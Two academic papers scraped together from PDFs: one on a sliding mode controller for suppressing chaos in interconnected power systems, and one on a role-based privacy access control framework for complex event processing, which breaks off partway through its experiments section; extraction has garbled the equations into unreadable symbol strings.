/Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ssqv7d4xyjfizftlgawxtv4pvq ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 5 A New Non-Singular Terminal Sliding Mode Control and Its Application to Chaos Suppression in Interconnected Power System Wang Nian, Chen Hui, Ding Dawei school of Electronics and information engineering, Anhui university Hefei, 230601, China e-mail: wn_xlb@ahu.edu.cn Power Quality Engineering Research Center, Min of education Hefei, 230601, China e-mail: 1335965245@qq.com Abstract—Interconnected power system is a typical nonlinear dynamical system, it will cause great harm to the interconnected power system when the chaos occurred. This paper analyses the nonlinear dynamical behavior of the interconnected power system with a uncertain electromagnetic disturbance amplitude, and the influence of the electromagnetic disturbance amplitude on the stability of the system is obtained. Thus, this paper proposes a novel non-singular terminal sliding mode control to restrain the chaos, then the system will reach a stable state in a fixed time. According to the theoretical analysis, by introducing the saturation function, the control method can solve the singularity problem in the sliding mode control, and the interconnected power system will be stable in a short time when it’s in chaos. The simulation prove the correctness of the method. Keywords-Interconnected Power System; Saturation Function; Non-singularity; Sliding Mode Control; Fixed Time I. INTRODUCTION Power system is a kind of nonlinear dynamical system with multi-degree of freedom, strong coupling and multi-variable, which has rich dynamical behaviors. With the development of power grid system, grid interconnection has became a inevitable trend, and it can improve the quality of power. At the same time, it also provides convenience for the dispatching optimization of power system[1-3]. However, chaos often appears in the interconnected power system, it will bring great challenge to the stability of power system. For example, as the result of chaotic oscillations[4-6], several large area power outages appear in the United States, China and Canada in 1955. And it is difficult to suppress this phenomenon by using linear controller[7]. Therefore, it is necessary to study the mechanism of chaos in interconnected power systems and it is meaningful to design the nonlinear controller to suppress the chaos. Due to the high nonlinear characteristics of the interconnected power system, its stability is very sensitive to outside disturbance. If the perturbation is too large, its operating point will change obviously. There are also some tools to analyze its stability which include geometric method, energy function, bifurcation theory and numerical simulation[8]. Recently, there are a lot of scholars to study the stability of power grid system. For example, Nayfeh [9] uses the multi-scale perturbation method to study the stability of single machine power system and the bifurcation analysis of a single machine infinite power system is investigated by Duan[10]. Because coupling power angle exists in the interconnected power system, the inherent dynamical behavior of interconnected power system will be more abundant. Through the detailed numerical simulation, the influence of the conventional non-linearity index on the dynamic characteristics of the interconnected power system is expounded[11]. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 6 In recent years, with the development of control method, the system is controlled from the single machine infinite system to multiple machine system, and the interconnected power system. In this paper, by proposing a fix-time non-singular terminal sliding mode control to realize stability when chaos occurred in interconnection power system. Some systems can be stabilized in a fixed time by using finite time control, this control method can be used in a lot of fields (for instance[12-13]). However, it is difficult to ensure the boundary convergence time when it is independent of the initial state. Therefore, in some practical system, it is not workable to use this control method when the initial condition is uncertain. Fortunately, this question was solved by Polyakov with the fixed-time stability theory[14]. Zuo[15] proposed a non-singular fixed-time terminal sliding mode controller for a class of second order nonlinear systems that can solve the singularity problem of terminal sliding mode controller in most instances. In this paper, by using the fast terminal sliding mode control can make the system convergence to steady state in finite time, the saturation function[16] and fast fixed time stability theory that can solve the singular problem through theoretical proof in this control method. This control method not only solve the singularity problem of the sliding mode controller, but the convergence speed is faster. Motivated by the above analysis, this paper investigated the dynamical characteristics and control of interconnected power system. Section 2 introduces the dynamical characteristics of the interconnected power system, by introducing the maximum Lyapunov index, power spectrum, phase diagram and timing diagram, the paper decribe the dynamic of the interconnected power system. when the amplitude of electromagnetic disturbance is v=1.3,the system is in chaos. a non-sigular sliding mode variable structure control method has been introduced in Section 3 and the effectiveness of the control method can be obtained by theoretical analysis, the advantages of this method are verified, and the convergence time is calculated in Section 4.And Section 5 gives the conclusion of this paper. II. THE ANALYSIS OF THE MODEL AND DYNAMIC CHARACTERISTICS OF THE INTERCONNECTED POWER SYSTEM There are two kinds of oscillation modes in interconnection power system, one is a single generator acts on other generators in the system with the frequency is between 0.5 and 2.0 Hz. The other oscillation mode is mainly expressed as a generator group in a region interacts with a generator group in another area, the frequency is between 0.1-1.0 Hz. This paper studies the interconnected power system model with two generators. Considering the influence of the amplitude of the electromagnetic disturbance power, the model is as follows: ( ) ( ), ( ) 1 [ sin( ( )) ( ) cos( ) sin( ( )) cos( )] s m k e d t t dt d t P t D t P P t t P t dt H                 Where, ( )t is the phase angle between the excitation potential and the terminal voltage between the two generators, and ( )t is the angular velocity of the two generators. D is the equivalent damping coefficient. , , , s m e k P P P P represents the amplitude of the electromagnetic power, the mechanical power, the load disturbance power, and the electromagnetic disturbance power, respectively. ,  is the electromagnetic power disturbance frequency and the load disturbance frequency. H is the equivalent moment of inertia. In order to analyses the dynamics of the interconnected power system, the simplified model is obtained: 1 2 2 1 2 1 ( ) ( ), ( ) sin( ( )) ( ) cos( ) sin( ( )) cos( ) dx x d dx x x v x d                     (2) Where 1 2 ( ) ( ), ( ) ( ) / , / , / , / , / , / , / , / s s m s k s e s s s s x t x t H P D HP P P v P P P P H P H P t P H                      Here, the parameters can be selected as 0.4, 0.02, 0.2, 0.8           . A. Lyapunov exponent The Lyapunov exponent is an important parameter of the system that can be used to measure and determine whether 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 7 the dynamic system is in the chaos. When the maximum Lyapunov exponent of the dynamic system is greater than 0, it can be concluded that the system is in chaotic oscillation state. Figure 1. The Lyapunov exponent B. Power spectrum To study the chaotic behavior of a system, it is effective to use power spectrum analysis methods. Actually, power spectrum analysis is through the time and space translate to the frequency space for the signal frequency structure. When the chaos occurs in the system, the power spectrum of the system behaves as a continuous irregular distribution, for example in fig.2(c). (a) (b) (c) Figure 2. Power spectrum Similarly, the phase space map also is a tool to determine whether the system is in chaos. (a) (b) (c) Figure 3. Phase plane plots 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 8 According to the maximum Lyapunov exponent, phase diagram, and power spectrum of interconnected power system, we can know that the interconnected power system is in an irregular non-periodic chaotic state when the parameter 1.3v  .This chaotic state will cause great harm to the stability of the system, it will lead to a large area of power outages. Therefore, it is necessary to study the method to restrain the chaos in interconnected power system. III. THE SLIDING MODE CONTROLLER DESIGN In this section, the paper proposes a control scheme that can restrain chaos in power system, this paper needs to add control law in the second item in control equation that can make the system output 1 x convergences to the control target, namely, 1 2 2 , ( ) ( , ) ( ) , x x x f x g x t d t u         (3) Where : 1 2 ( ) sinf x x x     : 1 ( , ) cos( ) sing x t v t x  , ( ) cos( )d t t  . By proposing a timing non-singular fast terminal control method, the system can be smoothly stabilized on the sliding surface s . The sliding surface s is designed as: 1 1 1 1 1 1 1 1 1 ( ) (| | 1) 2 2 2 2 1 1 1 1 1 m m p sign x n n q s x x x         (4) the paper can get the reach law : 2 2 2 2 2 2 1 1 ( ) (| | 1) 2 2 2 2 2 2 m m p sign s n n q s s s          Here, after reading the relevant literature [18 ] about how to overcome the singularity in terminal sliding mode control. This paper quotes saturation function that can solve the question. 1 1 1 1 1 1 1 2 2 2 2 2 2 1 1 1 1 1 ( ) (| 1|) 1 2 2 2 21 1 1 2 1 1 1 1 1 2 1 1 1 ( ) (| | 1) 2 2 2 2 2 2 1 1 [ ( ) ( 2 2 1 ( ) (| | 1)) ] 2 2 ( , ) m m sign x n n p q m m p sign s n n q m u f x dt n m sign x x x n p sat x x h q s s                         (6) In control input, the paper quotes saturation function to limit the amplitude of singularity term 1 1 1 1 2 p q x x  ,where the saturation function is , | | , ( , ) ( ), | | , x if x y sat x y y sign x if x y      (7) Theorem 1 In control law(6), if there is a positive number 1 2 1 2 , , ,    ,and also 1m , 1 n , 2 m , 2 n , 1 p , 1 q , 2 p , 2 q is odd positive integers satisfying 1 1m n , 2 2m n , 1 1p q , 2 2 p q , and 1 1 ( ) / 2m n , 2 2 ( ) / 2m n , 1 1 ( ) / 2p q , 2 2 ( )p q is odd positive integers. The system 11 will be stable in a fixed time. proof 2 1 1 2 V s  (8)  2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 1 ( ) (| | 1) 2 2 2 2 1 2 2 1 1 ( ) (| | 1) 1 1 2 2 2 2 2 2 1 1 ( ) (| | 1) 1 1 2 2 2 2 2 2 2 1 2 1 ( ) (2 ) (2 ) m m p sign s n n q m m p sign s n n q m m p sign s n n q V s s s s s s s V V                                     When | | 1s  2 2 2 2 1 1 2 2 1 2 1 2 1 (2 ) (2 ) m p n q V V V       (10) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 9 When | | 1s  2 2 1 2 1 2 1 2 1 (2 ) (2 ) p q V V V      (11) Obviously, 1 0V  , so the control system will stable in expect target non-singularity. Theorem 2 The singularity item of the control input is restricted by the saturation function method, so that the system does not affect the stability analysis even if there is a singular region. Proof Defined inequality 1 1 1 1 1 1 2 1 | | p qp x x h q    as the singularity area. The state variable 1 x in first equation at system(3). 1 1 2 0 ( ) (0) ( ) t x t x x d   (12) When 2 ( ) 0x t  , 1 ( )x t will increase monotonically and leave the singularity. If 2 ( ) 0x t  , 1 ( )x t will decrease monotoniclly and leave the singularity. Therefore, the existence of the singular region does not affect the results of the stability analysis . Arrival time analysis Consider the following differential equation 1 1 ( ) (| | 1) 2 2 2 2 pm m sign y qn nx x x         (13) Where, assuming 0, 0   , and , , ,m n p q is odd positive integers, the system will stable in a fix time. Proof The above system can be written as follows: ,| | 1 ,| | 1 pm qn p q x x x x x x x x                  (14) A new variable is defined as 1 p q z x   , so, the first equation in the above system can be written 1 0 m p n q p qq p q p z z q q         (15) Let [( ) ] / [ ( )]m n q n q p    , can get 1 0 q p q p z z q q         (16) Similarly available, the second equation in system can be obtained 0 q p q p z z q q        (17) So, the maximum convergence time is 0 0 0 1 0 11 0 1 1 lim ( ) lim ( ) 1 1 1 1 ( ln(1 )) ln(1 ) z z z q T z dz dz q p z z q n q q p m n q p                                 (18) Without losing the general consideration of second order systems, the fix time for the controlled system to reach the slid surface is 2 21 1 2 2 2 2 2 2 2 1 2 2 2 2 2 2 2 2 21 1 ln(1 ) 2 2 2 m p n q n q T m n q p            (19) When the controlled system reaches the sliding surface 0s  , the target sliding mode of the system satisfies the following 1 1 1 1 1 1 1 1 1 ( ) (| | 1) 2 2 2 2 1 2 1 1 1 1 m m p sign x n n q x x x x          (20) The corresponding system 1 x will converge in a fixed time: 1 11 1 1 1 2 2 1 1 1 2 1 1 1 1 1 1 1 2 21 1 ln(1 ) 2 2 2 m p n q n q T m n q p            (21) The convergence time for system is 1 11 1 1 1 2 2 1 11 1 1 1 2 2 1 1 1 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 21 1 ln(1 ) 2 2 2 2 21 1 ln(1 ) 2 2 2 m p n q m p n q n q T T T m n q p n q m n q p                         (22) IV. SIMULATION EXPERIMENT The proposed control method is applied to suppress chaotic oscillation in studied power system. The parameters 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 10 of the controller is 1 10  , 1 5  , 2 10  , 2 5  , 1 9m  , 1 5n  , 2 9m  , 2 5n  , 100h  , 1 5p  , 1 9q  , 2 5p  , 2 9q  . The initial value of the controlled system is 1 2 [ , ] [0.5, 0.1]x x  .The dynamics of the system under this parameter have been obtained in the second part, and the system is in a chaotic state before it is controlled. As shown in figure 4, before being controlled, the system is in a chaos. Figure 4. Time domain waveform(uncontrolled) Figure 5. Time domain waveform after control Figure 6. Phase plane plots 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 11 Figure 7. Power spectrum From Fig.5, this paper can get that the system under chaotic oscillation is controlled by the control method proposed in this paper, then it will converge quickly to the desired target within a fixed time. By contrasting the Fig.6, Fig.7, this can find this result. The system will be in chaos when it’s uncontrolled, but the method which have proposed in this paper apply in the interconnected system, the system is stabilized. V. CONCLUSION In this paper, by plotting the Lyapunov exponent diagram, power spectrum and phase diagram of the interconnected power system, the influence of the amplitude of the electromagnetic disturbance for the system has been analyzed. According to the three stability criteria, when the system parameter 1.3v  , the interconnected power system will be in chaos. So, a non-singular terminal sliding mode control method with fixed time stability has been applied in the system when it’s in chaos. By comparing the system output, we can find that the control method proposed in this paper can restrain the chaotic oscillation, and the interconnection system is stabilized in a fixed time. The singularity problem in the terminal sliding mode control is eliminated by introducing the saturation function. Due to the timing convergence characteristics and non-singularity of the proposed method, it will be applied to the actual power equipment. VI. ACKNOWLEDGMENT The paper supported by National Natural Science Foundation of China (61201227) and Major science and technology projects in Anhui Province (16030901058). REFERENCES [1] Fuhong Min ,Yaoda wang, Guangya Peng, Enrong Wang,and Jane A.Auth,2016, “Bifurcations, chaos and adaptive backstepping sliding mode control of a power system with excitation limitation”.AIP Advances, 6, 085214 [2] Jyoti Ranjan Nayak, Tridipta Kumar Pati, Binod Kumar Sahu, Sanjeeb Kumar Kar, 2015, ICCPCT “Fuzzy-PID Controller Optimized TLBO Algorithm on Automatic Generation Control of a two-area Interconnected Power System” [3] Sat Sat Aung, Zaw Min Htike 2016 ASRJETS “Modeling and Simulation of Load Frequency Control for Three Area Power System Using Proportional Integral Derivative (PID) Controller” 26 2 301- 315 [4] Chen Ju-hua,Xu Nan.Application resrarch on small signal stability analysis of power systems”.Proceedings of the Csee, 2004, 24(12):52-57 [5] Du Quwei, Xiaoshu Luo.Passivity-based adaptive control of chaotic oscillations in power system”. chaos solitons&Fractals 2007. 31(3):665-671 [6] MM Zirkohi, Tkumbasar, T Lin, “Hybrid Adapive Type-2 Fuzzy Tracking Control of Chaoic Oscillation Damping of Power Systems” Asian Journal of Control 2017.19 [7] J Ni, L Liu, C Liu, X Hu.chattering-Free time scale separation sliding mode control design with application to power system chaos suppressin.Mathematical Problems in Engineering,2016:1-14. [8] Q Sun, Y Zhang, H He, D Ma, H Zhang.A Novel Energy Function-Based Stability Evaluation and Nonlinear Control Approach for Energy Internet.IEEE Transactions on Smart Grid,2017, PP(99) 1-16 [9] Ali Nayfeh DEAN T. MOOK Donald W.Lobitz 1974 12 9 Numerical Perturbation Method for the Nonlinear Analysis of Structural Vibrations 1222-1228 [10] Xiaodong Wang, Yushu Chen, Gang Han, Caiqin Song 2015 “Nonlinear dynamic analysis of a single-machine infinite bus power system Applied Mathematical Modelling “39 2951-2961 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 12 [11] Min Fu-Hong, Ma Mei-Ling Zhai Wei Wang En-Rong 2014” Chaotic control of the interconnected power system based on the relay characteristic function” Acta Phys. Sin. 63 050504 [12] X. Y. He, Q. Y. Wang, and W. W. Yu, “Finite-time containment control for second-order multiagent systems under directed topology,” IEEE Trans. Circuits Syst. II, Exp. Briefs, vol.61, no.8, pp.619-623, Aug.2014 [13] Y. Q. Wu, B. Wang, and G. D. Zong, “Finite-time tracking controller design for nonholonomic systems with extended chained form,” IEEE Trans. Circuits Syst. II, Exp. Briefs, vol.52, no.11, pp.798-802, Nov.2005 [14] A. Polyakov, “Nonlinear feedback design for fixed-time stabilization of linear control systems,” IEEE Trans. Autom. Control, vol.57, no.8, pp.2106-2110, Aug.2012 [15] E. Cruz-Zavala, J.A. Moreno, and L.M. Fridman, “Uniform robust exact differentiator,” IEEE Trans. Autom. Control, vol. 56, no. 11, pp.2727-2733, Nov.2011 [16] Z. Y. Zuo, “Non-singular fixed-time terminal sliding mode control of non-linear systems,” IET Contr. Theory Appl., vol.9, no.4, pp.545-552, Apr. 2015 [17] Junkang Ni, Ling Liu, Member, IEEE, Chongxin Liu, Xiaoyu Hu and Shilei Li 2016 IEEE TRANSACTIONS ON CIRCUITS AND SYSTEMS-II: EXPRESS BRIEFS [18] B xu.Composite Learning Finite-Time Control With Application to Quadrotors.IEEE Transactions on Systems Man & Cybernetics Systems.2017, PP(99):1-9. work_su3ucr3qh5gv3isgkna5ie37mi ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-009 77 A CEP Privacy Security Access Control Framework Based on Event Attribute Detecting Tree Bo Hong* School of Computer Science and Engineering, Xi’an Technological University, Xi’an, 710021, China e-mail: 1964383053@qq.com Xin Jing School of Computer Science and Engineering, Xi’an Technological University, Xi’an, 710021, China Abstract—Complex event processing (CEP) technology is a study focus in the data flow processing area, while privacy security protection is the key problem that needs to be solved. In order to prevent illegal users from acquiring any information via registered event patterns, this paper discusses the CEP privacy security access control object in depth, formally defines four types of event attribute operators including completely read, partially read, access denied and quantity statistics, presents a privacy security protection engine with the event attribute detecting tree as the operating mechanism and puts forward a new feasible CEP privacy security access control framework based on this. The experimental result shows that such framework is able to realize efficient privacy information filtration based on the user role to reach the goal of CEP detecting information processing in a safe manner. Keywords-Complex Event Processing; Privacy Security Access Control; Event Attribute Detecting Tree; Event Attribute Operator; Security Protection Engine I. INTRODUCTION Data flow processing is a very important and active area in modern database technology. CEP technology[1] has become the study focus of such field since its inception as it is capable of integrating the information from the numerous data source distributed and digging the valuable dynamic meaning among the information from the high-speed data flow in real time. CEP technology is thoroughly changing the way of subscription & distribution and application data of the traditional information system. It acts as the hub of information fusion and dispersion by uncoupling the information provider and recipient and playing the roles including information observer, analyst and decision maker. As the Internet of Things sensor and the network based new application quantity surge, the information capacity to be processed sees an explosive growth trend. Thus, CEP technology is increasingly becoming an essential tool in many application fields. However, for most CEP engines at present, the processes and content of the complex event processing and output are open. That is to say, not only legal advanced application can utilize the CEP engine to obtain valuable information, but also illegal users are also able to acquire any necessary information for their criminal behaviors. This presents the CEP technology with huge responsibility with respect to the privacy security protection in detecting information. Up to now, there are few studies on CEP privacy security access control, thus the research result in such aspect is just in the initial stage. In order to hold back over-class information access, literature [2] conducts security access expansion for the CEP detection and event model, which effectively prevents the unauthorized information from being leaked or tampered to the outside. It first increases two attribute fields, i.e. "security level" and "current stage", behind the traditional event model, and then adds security level checker in the query matching tree. The checker allows the event the security level of which is lower than the level set by this query matching tree to inflow so as to realize access control of the information at different security levels. Literature[3, 4]designs a set of novel security access operators and comes up with a re-query method based on such operator set with the relation algebra and query graph model of Aurora as well as the view idea of the traditional International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 78 database management system. Through this method, the security access operators are able to be inserted to the Aurora query graph model in the most effective way. As a result, CEP can perform security access control on the data flow in pursuant to the predefined security strategy file. The above studies share the same thought, i.e. rewrite the query of the CEP event pattern, adjust the original performing structure, and insert specialized security detecting unit to form an operation structure combining security and the original detection pattern. Such kind of method is complex and has some deficiencies. 1. Users have different security strategies, thus it is necessary to save all relevant user security strategies in the security detection unit when performing multiple user security strategies in one CEP query, which obviously will cause logical mess in the course of performance. 2. The newly added security detection unit will produce more work load in the process of CEP detection and influences its execution efficiency, meanwhile the mixed operation structure will be hard to be optimized (e.g. share intermediate result). In order to avoid the above problems, this article will put forward an efficient CEP privacy security access control framework that is feasible and easy to be integrated. II. CEP PRIVACY SECURITY ACCESS CONTROL OBJECT The basic unit of CEP processing work is event. Thus, the content of its privacy security access control is the information included in the event. According to the event model definition provided by the author in the early stage of the study (Event_Model:= Event_Type ＠ (Attribute_Name[Data_Type]n) n≥1;), event is a tuple composed of N attributes (A1,…,An) and attribute field is the minimum unit saved by the information value. Therefore, this paper determines event attribute as the object of CEP privacy security access control and explain its concept in the form of definition. Definition 1 Event Attribute It specifies that each event flow Stri input into the CEP engine contains one type and can only contain one type of event ETj. Certain event type ETj is made of N attributes Pk k≥1. P(Stri) represents the set of all attributes included in certain event flow Stri and P(ETj) represents the set of all attributes included in certain event type ETj, then P(Stri)=P(ETj) if ETj∈Stri. In addition, in this paper, Stri.pk (or ETj.pk) represents certain attribute in certain event flow (or certain event type). The user's access right to the event attribute (ETj.pk|Stri.pk) content meets four cases: Completely read, partially read, access denied and quantity statistics. Therefore, a formalized description of such four types of access control operator is firstly given. Completely read operator ξ: ξ(P(ETi))|ξ(P(Stri)) represents complete access control right to the event attribute information in the event type (or event flow). It can be abbreviated as ξ(ETi)|ξ(Stri). ξ can be used for some attributes set of the event type (or event flow), ξ(ETi[p1,p2,…]) p1,p2,…∈P(ETi) means only the information content of some attributes (p1,p2,…) in the event type is allowed to be accessed. Partially read operator ф: ф(Expr)(ETi)|ф(Expr)(Stri) means the event attribute information in the event type (or event flow) can be accessed as per the definition of the conditional expression set Expr. The expression expri in Expr expression set only exists as conjunction relationship, e.g. ETi.location=“L1”∧ ETi. temperature>30, means the location attribute of such event is L1, and the temperature value attribute is greater than 30. Access denied operator ψ: ψ(P(ETi))|ψ(P(Stri)) represents complete denial of the access to the event attribute information in the event type (or event flow). It can be abbreviated as ψ(ETi)|ψ(Stri). Likewise, operator ψ can also only deny the access to some attributes, ψ(ETi[p1,p2,…]) p1,p2,…∈P(ETi) means only the information content of some attributes (p1,p2,…) in the event type is denied to be accessed. Quantity statistics operator Ω: This access operator corresponds to aggregate operations that do not care the specific value of the event attribute but concern the total number, mean value and other statistics information of the event. Ω(F(Pk))(ETi)|Ω(F(Pk))(Stri) means it has statistical right to the event attribute Pk in the event type (or event flow), of which, F is calculation function, including min, max, count, avg and sum, etc. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 79 In pursuant to the above formalized description of the control operators of security access to event attribute (record all operators set Э), the content to which the user may have privacy security access for the CEP input event flow should substantially be the result of Э operation on the input event flow by such user. That is to say, only the information in line with the given user security strategy is filtrated. Based on this, this article defines CEP privacy security access control object as follows. Definition 2 Privacy Security Access Control Object The privacy security access control object in CEP engine is, of which, Strs is the input event flow set of the CEP engine, Э is the set of the security access control operators of event attribute, and Pi is the event attribute set in the event flow. Event attribute privacy security access operator Э Event attribute object STRs.Atts Hierarchy role authorize Users allot Figure 1. Privacy security access control model As shown from the above definition, when allocating security access control right to a user, the system administrator needs to explicitly designate the privacy security protection object to which such user can access for such user, i.e. designate the access right to each event attribute content for such user. This will bring huge work load for the system administrator. In order to operate flexibly and conveniently as well as reduce the work load on right allocation, this paper divides the security access control right of users based on the RBAC model and hierarchy role thought. As shown in Fig.1, hierarchy role applies tree structure. High level role may include several predecessor roles and will automatically inherit the security access rights of all predecessor roles to event attribute. Similarly, a user instance may have one or more role identities so as to realize flexible role allocation. III. CEP PRIVACY SECURITY ACCESS CONTROL FRAME According to the above privacy security access control object, this paper presents CEP security access control framework (CEP-SACF) as shown in Fig.2. CEP-SACF is easy to be realized without changing the original CEP implementation structure. Senior manager Privacy protection object System User Common user Privacy protection engine Privacy protection engine System user CEP pattern execution space designate Assign access control register register login login Common user CEP pattern execution space CEP GUI E v en t st re am b u s Figure 2. CEP privacy security access control framework International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 80 CEP-SACF operation includes three stages, i.e. user role authorization, pattern registration and privacy security access control. First of all, at the user role authorization stage, senior system administrator defines the privacy security access control object, designates corresponding security access operation to the event attribute requiring privacy protection and allocates it to the designated user role (user role is planned by level,[5, 6]to reduce authorization work load); then, the user logs in with the role allocated and enters CEP engine management interface where user may define its own business rule with CEP event pattern language[7], CEP manages GUI and will correlate the security rules related to such user role in the privacy security access control object strategy file to detect the legality of the event pattern to be registered. If there is no conflict of security rules, then such event pattern will be registered in the independent implementation space of such user role (at the time of the first registration, an independent operation space should be firstly created for such user role, and the event pattern hereafter will be registered under the namespace with the same name as the registered user role). If the event attribute content requested by the event pattern to be accessed is in conflict with the privacy security rules of this role, then a prompt of limited user right will show and registration of such event pattern will be denied; finally, the independent privacy security protection engine will operate between the input event flow and CEP engine. Each PSPE just saves the privacy security rules related to such user role and will make operations of permission (completely read operator ξ), rejection (access denied operator ψ), filtration (partially read operator ф) or modification (quantity statistics operator Ω) for the event attribute in accordance with the definition of privacy security access operator of event attribute Э. The event processed by operator Ω will be repacked. For example, certain event contains (ID, TimeStamp, Location) attribute previously and such event only permits calculate the total number (perform Ω operation for its ID attribute). Other attributes are private information that is not permitted to be accessed. Then under the function of operator Ω, PSPE will allow all such events to pass with the private information contained flowing through the event removed. A new event only containing ID attribute will be generated. Then it will be sent to the corresponding operation space. Furthermore, in order to ensure security of CEP output result, PSPE will also receive the output in the operation space protected by it and send the result to the user within the user role of such space. To ensure that under the registered event pattern, the user will not acquire the privacy security access right designated to such user role beyond the senior administrator and guarantee the efficiency of legal detection, this article verify the event pattern registered by the user with the following algorithm. Algorithm 1 Validity Verification Algorithm of CEP Privacy Security Access Control in Event Pattern Input: The event pattern declared by the user and user role; Output: The event attribute array NProps[] without legal access right in the event pattern definition; 1. if (find Prop.aggregation(*) in Event_pattern)==true Props<String,String>.put(EventType,aggregation_operator_name); 2. Iterator (expression in where clause ) { EventType=get_EventType(in expression); Property=get_ Property(in expression); Props<String,String>.put(EventType, Property);} 3. for(Map.Entry<String, String> entry:Props.entrySet()){ Select * from Secunity_rule where user_role=login_user_role; for( Dataset.hasNext() ){ if (Dataset[i].eventProperty==entry.getKey()) if (NoLegality(Dataset[i].accessOperator,entry.getValue())==ture) NProps[entry.getValue()];}} 4. System.out.println(NProps[]); International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 81 IV. PRIVACY SECURITY PROTECTION ENGINE (PSPE) PSPE is independently created with CEP event pattern implementation space. Its content is determined by the privacy security access control rules defined by the senior system administrator and automatically updated depending on the adjustment of the rules. The basic mechanism of PSPE operation is copy, i.e. regard the event flow input into CEP engine as data bus and send the copy of the event in line with the privacy security protection rules on the data bus to the event pattern detection network inside the operation space. Beyond that, no operation will be made. This mechanism can effectively guarantee the event flow will flow through all privacy security protection engines and finally pass the event containing correctly authorized information to CEP processing nodes. The working principle inside PSPE is shown in Fig.3. It will convert the filtration operation of the event attribute to the tree structure with the event type as the root node, of which, EventType is the event type that can be processed in this space. The subnode under the root node of the event type is the event type included. The event attribute node will be included in the access operation defined in the privacy security protection rules (as one event attribute can only define one type of security access operation type, the event attribute node only contains one subnode). Here are some kinds of common detecting tree in PSPE. As shown in Fig.3 (a), suppose certain event type contains three event attributes and for certain user role, these three event attributes are all permitted to be accessed, thus the combined node will pass such event to the internal implementation space completely. It is contrary in Fig.3 (b) where the three attributes of the event are denied to be accessed, and such event will not be passed internally. Fig.3 (c) shows the general situation under privacy security access control, i.e. user role is only allowed to access to some attribute content of one event while the private part is not permitted to be viewed. As Attr2 attribute is denied to be accessed, the node of such detecting tree will only combine Attr1 and Attr3 attributes and outputs a new event which only contains these two attributes. Fig.3 (d) displays the appearance of the detecting tree which conditionally reads the event attribute, of which, the condition verification includes single value comparison (as shown in Figure 2 (e), the comparison content: Attr1= value 1 && Attr3!= value 2) and multiple value comparison (as shown in Fig.3 (d), the comparison content: value 2<Attr2< value 1). The node will only allow the event whose comparison result is true to pass through. Fig.3 (f) shows the situation of event attribute statistics and calculation. The node will permit such event attribute content to be accessed and the function of node Ω is equivalent to ξ. As known from the above common detecting tree structure, PSPE is able to effectively prevent the unauthorized information from inflowing and using. By means of repackaging the event, the separation of the authorized and unauthorized information can be guaranteed. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 82 Event Type Attr1 ξ ξ ξ Attr2 Attr3 Attrs∪ Event Type Attr1 ψ ψ ψ Attr2 Attr3 Event Type Attr1 ξ ψ ξ Attr2 Attr3 Attrs∪ Event Type Attr1 Ω ψ ф Attr2 Attr3 Attrs∪ [=,value1] (a) (b) (c) (f) Event Type Attr1 ξ ф ξ Attr2 Attr3 Attrs∪ [<,value1] [>,value2] (d) Event Type Attr1 ф ξ ф Attr2 Attr3 [=,value1] [!=,value2] (e) Attrs∪ Figure 3. Detection tree structure in privacy security protection engine V. PERFORMANCE TEST OF PRIVACY SECURITY ACCESS CONTROL FRAMEWORK The core part of CEP-SACF operation is PSPE, the operation performance of which is related to the input event flow rate and the total quantity of the internally registered detecting tree (record such parameter as ETs). The above content shows that the working efficiency of the detecting tree is related to the number of internal event attribute node (record such parameter as ATs) and the node type of the access operator (record such parameter as OPs). Therefore, this group of experiment will test the three parameters that influence the efficiency of the engine respectively. First of all, simulate the input event flow, each of which only contains one type of event. Each event is composed of one event type attribute field and several other attribute fields. The event flow generator will utilize multiple courses to produce event flow in parallel and send it out to simulate real scene. Then, the buffer queue of PSPE will receive these events and conduct security detection by the first-in-and-first-out sequence. The detecting tree indexes with the hash table and realizes it with the custom tree structure. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 83 (a) Experiment 1 influence of detection tree number (b) Experiment 2 influence of event attribute number (c) Event attribute security access operator efficiency test Figure 4. Privacy security protection engine performance testing Experiment I registers three groups of Ets={10,20,30} with different quantity for contrast. It receives data at 1,000-10,000 events/s and provides that the attribute quantity included in all events of such group of experiment is 2. The event attribute access operator is completely read operator ξ. As known from Fig.4 (a), as the input rate increases, the time taken by PSPE presents a linear growth trend, but the rise of total Ets has little influence on PSPE implementation efficiency because Hash Index has a high efficiency. The growth of total Ets has little influence on its index rate. Experiment II tests the three control groups in which the attribute quantity of the event is Ats={2,4,6}. The total detecting tree registered in such group of experiment is Ets=30 (thus, the actual total number of the attribute detecting tree in PSPE is 60, 120 and 180, respectively). Also, it receives data at 1,000-10,000 events/s and provides that the event attribute access operator of all attributes is completely read operator ξ. As known from Fig.4 (b), parameter Ats has a great influence on the implementation efficiency of PSPE. As the total Ats increases, the calculated amount of the traversal node inside PSPE will undergo a cumulative rise. The processing time taken by the three control groups basically keeps a multiple relationship. The total consuming time of PSPE is at millisecond level, which has little influence on the overall operation efficiency of CEP-SACF. Experiment III tests the performance of ξ, ф and ψ (as Ω and ξ is different in function, repeated test will not be done for Ω). This group of experiment provides Ets=30, Ats=2, 